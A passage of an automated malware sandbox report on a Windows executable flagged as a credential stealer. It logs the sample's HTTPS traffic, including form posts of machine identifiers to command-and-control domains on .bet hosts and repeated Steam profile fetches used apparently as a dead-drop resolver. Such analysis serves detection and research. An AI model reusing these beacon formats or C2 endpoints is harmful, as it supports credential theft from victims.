                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          2192.168.2.849684188.114.97.34437128C:\Users\user\Desktop\nvtoaldlrg.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-03-13 13:58:13 UTC272OUTPOST /gdJIS HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=6nR23kDEj
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 15012
                                                                                                                                                                                                                          Host: citydisco.bet
                                                                                                                                                                                                                          2025-03-13 13:58:13 UTC15012OUTData Raw: 2d 2d 36 6e 52 32 33 6b 44 45 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 33 37 30 39 63 65 36 61 33 39 36 64 61 33 33 37 39 36 37 64 34 35 35 61 35 64 35 37 39 34 37 0d 0a 2d 2d 36 6e 52 32 33 6b 44 45 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 6e 52 32 33 6b 44 45 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 38 36 35 41 31 44 38 38 42 42 43 42 38 44 32 36 38 45 30 39 41 33 37 44 44 34 44 44 44 44 0d 0a 2d 2d 36 6e 52 32
                                                                                                                                                                                                                          Data Ascii: --6nR23kDEjContent-Disposition: form-data; name="uid"73709ce6a396da337967d455a5d57947--6nR23kDEjContent-Disposition: form-data; name="pid"2--6nR23kDEjContent-Disposition: form-data; name="hwid"BF865A1D88BBCB8D268E09A37DD4DDDD--6nR2
                                                                                                                                                                                                                          2025-03-13 13:58:14 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:14 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj7pXljNcpwses9TgCp4hc2WHNT7xC%2B2KRfqe7JzpFKJIb5DXUzY4ze29yAx5L8Pd%2FfTeMZRkVMOUQpMpqtUacHoy4cmin9vQTm%2BmBGvyqq7uJYfrsBlKyUlDszPQ3R8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 91fc0b7ecbabd6e5-IAD
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=18511&min_rtt=14932&rtt_var=7411&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2830&recv_bytes=15942&delivery_rate=193880&cwnd=235&unsent_bytes=0&cid=4e3564aefe59ac65&ts=873&x=0"
                                                                                                                                                                                                                          2025-03-13 13:58:14 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 34 2e 31 31 30 2e 32 32 33 2e 31 34 38 22 7d 7d 0d 0a
                                                                                                                                                                                                                          Data Ascii: 46{"success":{"message":"message success delivery from 74.110.223.148"}}


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          3192.168.2.849730104.73.234.1024437128C:\Users\user\Desktop\nvtoaldlrg.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-03-13 13:58:21 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                          2025-03-13 13:58:21 UTC1962INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:21 GMT
                                                                                                                                                                                                                          Content-Length: 26244
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=cee889fd76b5b4226d768242; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                          2025-03-13 13:58:21 UTC14422INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                          2025-03-13 13:58:22 UTC11822INData Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 73 63 68 69 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 73 63 68 69 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e7 ae 80 e4 bd 93 e4 b8 ad e6 96 87 20 28 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                          Data Ascii: yle="display: none;"><div class="popup_body popup_menu"><a class="popup_menu_item tight" href="?l=schinese" onclick="ChangeLanguage( 'schinese' ); return false;"> (Simplified Chinese)</a>


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          4192.168.2.849731104.73.234.1024437128C:\Users\user\Desktop\nvtoaldlrg.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-03-13 13:58:23 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                          2025-03-13 13:58:24 UTC1962INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:24 GMT
                                                                                                                                                                                                                          Content-Length: 26244
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=cac8a6ba4568ff49bb7a7ac9; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                          2025-03-13 13:58:24 UTC14422INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                          2025-03-13 13:58:24 UTC11822INData Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 73 63 68 69 6e 65 73 65 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 73 63 68 69 6e 65 73 65 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e7 ae 80 e4 bd 93 e4 b8 ad e6 96 87 20 28 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                          Data Ascii: yle="display: none;"><div class="popup_body popup_menu"><a class="popup_menu_item tight" href="?l=schinese" onclick="ChangeLanguage( 'schinese' ); return false;"> (Simplified Chinese)</a>


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          5192.168.2.849733104.73.234.1024437128C:\Users\user\Desktop\nvtoaldlrg.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-03-13 13:58:26 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                          2025-03-13 13:58:27 UTC1962INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:26 GMT
                                                                                                                                                                                                                          Content-Length: 35710
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=740c83c77edb84e75be3f9bd; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                          2025-03-13 13:58:27 UTC14422INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                          2025-03-13 13:58:27 UTC16384INData Raw: 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09
                                                                                                                                                                                                                          Data Ascii: ctor" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home</a>
                                                                                                                                                                                                                          2025-03-13 13:58:27 UTC3762INData Raw: 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 79 65 72 41 76 61 74 61 72 41 75 74 6f 53 69 7a 65 49 6e 6e 65 72 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f
                                                                                                                                                                                                                          Data Ascii: <div class="playerAvatarAutoSizeInner"><img src="https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div></div><div class="profile_header_badgeinfo"><div class="profile_header_
                                                                                                                                                                                                                          2025-03-13 13:58:27 UTC1142INData Raw: 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 41 6c 6c 20 74 72 61 64 65 6d 61 72 6b 73 20 61 72 65 20 70 72 6f 70 65 72 74 79 20 6f 66 20 74 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e 65 72 73 20 69 6e 20 74 68 65 20 55 53 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 75 6e 74 72 69 65 73 2e 3c 62 72 2f 3e 53 6f 6d 65 20 67 65 6f 73 70 61 74 69 61 6c 20 64 61 74 61 20 6f 6e 20 74 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c
                                                                                                                                                                                                                          Data Ascii: All rights reserved. All trademarks are property of their respective owners in the US and other countries.<br/>Some geospatial data on this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_bl


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          6192.168.2.849738188.114.96.34437128C:\Users\user\Desktop\nvtoaldlrg.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-03-13 13:58:28 UTC263OUTPOST /bSHsyZD HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 111
                                                                                                                                                                                                                          Host: guntac.bet
                                                                                                                                                                                                                          2025-03-13 13:58:28 UTC111OUTData Raw: 75 69 64 3d 37 33 37 30 39 63 65 36 61 33 39 36 64 61 33 33 37 39 36 37 64 34 35 35 61 35 64 35 37 39 34 37 26 63 69 64 3d 61 36 65 33 34 38 33 35 32 39 33 64 61 31 37 38 32 38 30 33 34 63 39 36 32 34 66 34 62 36 34 39 26 68 77 69 64 3d 42 46 38 36 35 41 31 44 38 38 42 42 43 42 38 44 32 36 38 45 30 39 41 33 37 44 44 34 44 44 44 44
                                                                                                                                                                                                                          Data Ascii: uid=73709ce6a396da337967d455a5d57947&cid=a6e34835293da17828034c9624f4b649&hwid=BF865A1D88BBCB8D268E09A37DD4DDDD
                                                                                                                                                                                                                          2025-03-13 13:58:29 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Thu, 13 Mar 2025 13:58:29 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6FjNRpKX9myqsCVI%2FEK6Ul5nExbvd%2Bc0Apd42auOk6SNYjYk94jqARAstVtdWDJ0d7NOLLw%2B3UfDegyJDlDVm3KxH6s72ooo6SDNjmjy%2BUxw3UfU2aSXT6qHWVn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 91fc0be08cb3ba2a-SEA
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11263&min_rtt=10237&rtt_var=4717&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1010&delivery_rate=187637&cwnd=227&unsent_bytes=0&cid=16f4f0328ab1ade6&ts=1072&x=0"
                                                                                                                                                                                                                          2025-03-13 13:58:29 UTC61INData Raw: 33 37 0d 0a 7b 22 65 72 72 6f 72 22 3a 7b 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 31 2c 22 65 72 72 6f 72 5f 6d 73 67 22 3a 22 64 61 74 61 20 6e 6f 74 20 66 6f 75 6e 64 22 7d 7d 0d 0a
                                                                                                                                                                                                                          Data Ascii: 37{"error":{"error_code":1,"error_msg":"data not found"}}
                                                                                                                                                                                                                          2025-03-13 13:58:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:09:58:05
                                                                                                                                                                                                                          Start date:13/03/2025
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\nvtoaldlrg.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\nvtoaldlrg.exe"
                                                                                                                                                                                                                          Imagebase:0xac0000
                                                                                                                                                                                                                          File size:1'311'232 bytes
                                                                                                                                                                                                                          MD5 hash:4A0C3D026246920F6B8BD466CC5FDD8C
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                          Reset < >